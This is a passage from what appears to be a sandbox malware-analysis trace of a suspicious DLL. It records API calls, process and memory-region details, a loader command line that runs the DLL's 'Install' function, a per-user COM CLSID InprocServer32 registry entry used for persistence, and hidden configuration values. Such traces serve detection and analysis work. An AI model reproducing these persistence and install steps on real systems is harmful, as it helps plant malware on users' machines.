0x76212331 [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.700] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.700] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.700] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.700] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.700] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.700] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.700] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.700] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.700] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.700] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.701] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.701] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.701] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.701] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.701] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.701] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.701] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.701] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.701] GetVersionExW (in: lpVersionInformation=0x30fbd4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30fbd4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0032.701] GetLastError () returned 0x7f [0032.701] SetLastError (dwErrCode=0x7f) [0032.701] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x30f8c8, lpdwDisposition=0x0 | out: phkResult=0x30f8c8*=0x7c, lpdwDisposition=0x0) returned 0x0 [0032.702] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="1", cbData=0x4 | out: lpData="1") returned 0x0 [0032.702] GetLastError () returned 0x7f [0032.702] GetLastError () returned 0x7f [0032.702] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x30f9d4, lpdwDisposition=0x30fb30 | out: phkResult=0x30f9d4*=0x80, lpdwDisposition=0x30fb30*=0x2) returned 0x0 [0032.702] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x30f9d8*=0xe10, cbData=0x4 | out: lpData=0x30f9d8*=0xe10) returned 0x0 [0032.702] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x30f9d8*=0x1, cbData=0x4 | out: lpData=0x30f9d8*=0x1) returned 0x0 [0032.702] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0032.702] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x30fa7c*, cbData=0x58 | out: lpData=0x30fa7c*) returned 0x0 [0032.702] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x30fad4*, cbData=0x5c | out: lpData=0x30fad4*) returned 0x0 [0032.702] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0032.702] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0032.702] RegCloseKey (hKey=0x80) returned 0x0 [0032.703] HeapDestroy (hHeap=0x1180000) returned 1 Process: id = "26" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f9a0" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1229 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1230 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1231 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1232 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1233 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1234 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1235 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1236 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1237 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1238 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1239 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1240 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1241 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1242 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1243 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1244 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1245 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1246 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1247 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1248 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1249 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1250 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1251 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1252 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1253 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1254 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1255 start_va = 0x4a0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1256 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1257 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1258 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1259 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1260 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1261 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1262 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1263 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1264 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1265 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1266 start_va = 0xd0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1267 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1268 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1269 start_va = 0x680000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Thread: id = 58 os_tid = 0xb8c [0032.739] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f794 | out: lpSystemTimeAsFileTime=0x24f794*(dwLowDateTime=0xe13c12b0, dwHighDateTime=0x1d3dfba)) [0032.739] GetCurrentProcessId () returned 0xb88 [0032.739] GetCurrentThreadId () returned 0xb8c [0032.739] GetTickCount () returned 0x1756d [0032.739] QueryPerformanceCounter (in: lpPerformanceCount=0x24f78c | out: lpPerformanceCount=0x24f78c*=364874533) returned 1 [0032.740] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.740] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.740] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.740] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.740] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.740] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.740] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.740] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.740] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.740] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.740] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.741] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.741] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.741] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.741] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.741] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.742] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.742] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.742] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.742] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.742] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.742] GetCurrentThreadId () returned 0xb8c [0032.742] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"Install\"" [0032.742] GetEnvironmentStringsW () returned 0x307858* [0032.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0xf09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.742] FreeEnvironmentStringsW (penv=0x307858) returned 1 [0032.742] GetStartupInfoA (in: lpStartupInfo=0x24f6e4 | out: lpStartupInfo=0x24f6e4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.742] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.742] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.742] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.742] SetHandleCount (uNumber=0x20) returned 0x20 [0032.743] GetLastError () returned 0x0 [0032.743] SetLastError (dwErrCode=0x0) [0032.743] GetLastError () returned 0x0 [0032.743] SetLastError (dwErrCode=0x0) [0032.743] GetLastError () returned 0x0 [0032.743] SetLastError (dwErrCode=0x0) [0032.743] GetACP () returned 0x4e4 [0032.743] GetLastError () returned 0x0 [0032.743] SetLastError (dwErrCode=0x0) [0032.743] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.743] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f6c4 | out: lpCPInfo=0x24f6c4) returned 1 [0032.743] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f190 | out: lpCPInfo=0x24f190) returned 1 [0032.743] GetLastError () returned 0x0 [0032.743] SetLastError (dwErrCode=0x0) [0032.743] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x24f120 | out: lpCharType=0x24f120) returned 1 [0032.743] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f5a4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.743] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f5a4, cbMultiByte=256, lpWideCharStr=0x24ef08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.743] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x24f1a4 | out: lpCharType=0x24f1a4) returned 1 [0032.743] GetLastError () returned 0x0 [0032.743] SetLastError (dwErrCode=0x0) [0032.743] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.743] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f5a4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.743] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f5a4, cbMultiByte=256, lpWideCharStr=0x24eed8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿည矲狰Ā") returned 256 [0032.743] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿည矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.743] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿည矲狰Ā", cchSrc=256, lpDestStr=0x24ecc8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.743] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x24f4a4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 